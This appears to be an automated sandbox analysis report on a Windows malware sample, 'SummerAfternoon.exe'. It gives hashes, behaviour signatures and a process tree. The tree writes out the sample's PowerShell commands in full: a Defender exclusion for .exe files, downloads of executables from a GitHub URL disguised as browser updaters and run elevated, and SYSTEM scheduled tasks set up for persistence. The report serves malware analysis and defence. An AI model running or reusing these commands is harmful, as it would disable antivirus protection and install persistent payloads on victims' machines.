Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
09/06/2024, 07:13
Static task
static1
Behavioral task
behavioral1
Sample
SummerAfternoon/Microsoft.Web.WebView2.Core.dll
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
SummerAfternoon/Microsoft.Web.WebView2.Core.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
SummerAfternoon/Microsoft.Web.WebView2.WinForms.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
SummerAfternoon/Microsoft.Web.WebView2.WinForms.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
SummerAfternoon/SummerAfternoon.exe
Resource
win7-20240220-en
Behavioral task
behavioral6
Sample
SummerAfternoon/SummerAfternoon.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
SummerAfternoon/runtimes/win-x64/native/WebView2Loader.dll
Resource
win10v2004-20240508-en
General
-
Target
SummerAfternoon/SummerAfternoon.exe
-
Size
105KB
-
MD5
3969fb2b3f1aba78dd50c3cb6b4e2137
-
SHA1
b6fbd3cebda92a633369cbb979147ab645374d3b
-
SHA256
9895f823394e434bb9a8ae10a3086960e5d60b10ef5c3877e4bed7b9411a9710
-
SHA512
48b83334c8318c83c9122c44a26b02074c45bfed5ebd845b8ae4cc23957bda875473390ab2f91e46632eaef246c498ca63a3ef2df24771758296646bb4fb7c4e
-
SSDEEP
3072:9GbNdhPc9aHE6j7F7I6jmBJqUYfWcE/ishP7KIz1+Km/J:9GbNdtc9wdh7T6bqUQo/ish+s
Malware Config
Signatures
-
pid Process 2608 powershell.exe 2824 powershell.exe 2412 powershell.exe 2408 powershell.exe 2444 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1448 schtasks.exe 296 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2412 powershell.exe 2408 powershell.exe 2608 powershell.exe 2824 powershell.exe 2444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2412 powershell.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2604 wrote to memory of 2608 2604 SummerAfternoon.exe 30 PID 2604 wrote to memory of 2608 2604 SummerAfternoon.exe 30 PID 2604 wrote to memory of 2608 2604 SummerAfternoon.exe 30 PID 2604 wrote to memory of 2412 2604 SummerAfternoon.exe 31 PID 2604 wrote to memory of 2412 2604 SummerAfternoon.exe 31 PID 2604 wrote to memory of 2412 2604 SummerAfternoon.exe 31 PID 2604 wrote to memory of 2408 2604 SummerAfternoon.exe 32 PID 2604 wrote to memory of 2408 2604 SummerAfternoon.exe 32 PID 2604 wrote to memory of 2408 2604 SummerAfternoon.exe 32 PID 2604 wrote to memory of 2444 2604 SummerAfternoon.exe 34 PID 2604 wrote to memory of 2444 2604 SummerAfternoon.exe 34 PID 2604 wrote to memory of 2444 2604 SummerAfternoon.exe 34 PID 2604 wrote to memory of 2824 2604 SummerAfternoon.exe 38 PID 2604 wrote to memory of 2824 2604 SummerAfternoon.exe 38 PID 2604 wrote to memory of 2824 2604 SummerAfternoon.exe 38 PID 2824 wrote to memory of 1448 2824 powershell.exe 40 PID 2824 wrote to memory of 1448 2824 powershell.exe 40 PID 2824 wrote to memory of 1448 2824 powershell.exe 40 PID 2444 wrote to memory of 296 2444 powershell.exe 41 PID 2444 wrote to memory of 296 2444 powershell.exe 41 PID 2444 wrote to memory of 296 2444 powershell.exe 41 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\SummerAfternoon\SummerAfternoon.exe"C:\Users\Admin\AppData\Local\Temp\SummerAfternoon\SummerAfternoon.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Set-MpPreference -ExclusionExtension *.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/1.exe" -OutFile "$Env:LocalAppData\Updates\firefox_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\firefox_updater.exe""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/2.exe" -OutFile "$Env:LocalAppData\Updates\chrome_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\chrome_updater.exe""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/3.exe" -OutFile "$Env:LocalAppData\Updates\ms_edge_updater.exe"; schtasks /create /tn "EdgeUpdater" /tr "$Env:LocalAppData\Updates\ms_edge_updater.exe" /rl HIGHEST /sc ONLOGON /ru "SYSTEM" /f; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\ms_edge_updater.exe""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn EdgeUpdater /tr C:\Users\Admin\AppData\Local\Updates\ms_edge_updater.exe /rl HIGHEST /sc ONLOGON /ru SYSTEM /f3⤵
- Creates scheduled task(s)
PID:296
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/4.exe" -OutFile "$Env:LocalAppData\Updates\system_updater.exe"; schtasks /create /tn "SystemUpdater" /tr "$Env:LocalAppData\Updates\system_updater.exe" /rl HIGHEST /sc ONLOGON /ru "SYSTEM" /f; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\system_updater.exe""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn SystemUpdater /tr C:\Users\Admin\AppData\Local\Updates\system_updater.exe /rl HIGHEST /sc ONLOGON /ru SYSTEM /f3⤵
- Creates scheduled task(s)
PID:1448
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VHZSEA2GXM7NB21I6ZZR.temp
Filesize7KB
MD54f89019d3f71d02108ee020cb85c6b2b
SHA17c7f34ba42c545590f1b823e1045c5ac0796719c
SHA256ecbc72354af055626356626fc89d97515b3d8fa818716d765705c1f9825940ea
SHA512a7f362acb8a1418611e36da3a0c6a2b6ea8a856c131b5ea2fa1255ec9140e30241604afd9cfd73fe37dcf10f85d941d2b8f6a20785a4128b76b3349b032fc85c